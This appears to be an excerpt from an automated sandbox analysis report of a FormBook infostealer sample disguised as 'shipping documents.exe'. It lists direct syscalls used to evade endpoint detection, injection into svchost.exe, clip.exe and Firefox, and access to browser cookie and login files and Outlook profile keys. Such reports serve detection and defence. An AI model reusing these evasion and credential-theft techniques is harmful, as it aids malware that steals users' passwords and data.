Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]	2_2_02FD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_02FFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_02F5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]	2_2_03004940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]	2_2_02FBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]	2_2_02F30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]	2_2_02F60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]	2_2_02F6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]	2_2_02FBC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_02FBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]	2_2_02F649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_02FFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]	2_2_02FC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]	2_2_02FBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_006A81F7

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067A364 SetUnhandledExceptionFilter,		0_2_0067A364
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_0067A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0067A395

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread register set: target process: 5480

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread APC queued: target process: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\shipping documents.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3A9008

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006A8C93 LogonUserW,

0_2_006A8C93

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00653B4C

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00654A35

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006B4EF5 mouse_event,

0_2_006B4EF5

Source: C:\Users\user\Desktop\shipping documents.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents.exe"	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

0_2_006A81F7

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006B4C03

Source: shipping documents.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RxbWnCRczoMimJmDFzH.exe, 00000003.00000002.4517588110.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2194355675.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4517673343.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: shipping documents.exe, RxbWnCRczoMimJmDFzH.exe, 00000003.00000002.4517588110.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2194355675.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4517673343.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RxbWnCRczoMimJmDFzH.exe, 00000003.00000002.4517588110.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2194355675.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4517673343.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RxbWnCRczoMimJmDFzH.exe, 00000003.00000002.4517588110.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2194355675.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4517673343.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_0067886B cpuid

0_2_0067886B

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006850D7

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00692230 GetUserNameW,

0_2_00692230

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_0068418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0068418A

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00654AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: shipping documents.exe	Binary or memory string: WIN_81
Source: shipping documents.exe	Binary or memory string: WIN_XP
Source: shipping documents.exe	Binary or memory string: WIN_XPe
Source: shipping documents.exe	Binary or memory string: WIN_VISTA
Source: shipping documents.exe	Binary or memory string: WIN_7
Source: shipping documents.exe	Binary or memory string: WIN_8
Source: shipping documents.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_006C6596
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_006C6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
